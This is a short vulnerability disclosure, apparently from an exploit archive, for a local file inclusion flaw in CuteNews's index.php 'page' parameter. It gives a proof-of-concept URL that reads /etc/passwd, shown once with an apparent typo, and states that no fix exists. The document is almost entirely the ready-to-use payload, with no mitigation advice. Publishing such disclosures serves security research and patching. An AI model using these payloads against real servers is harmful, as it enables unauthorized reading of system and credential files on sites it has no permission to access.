CuteNews (index.php?page) Local File Inclusion Vulnerability

2010-10-05 13:15:09

==========================================================
CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

-=[p0c]=-

http://127.0.0.1/index.php?page= [lfi]
or
http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================

Fixes

No fixes

In order to submit a new fix you need to be registered.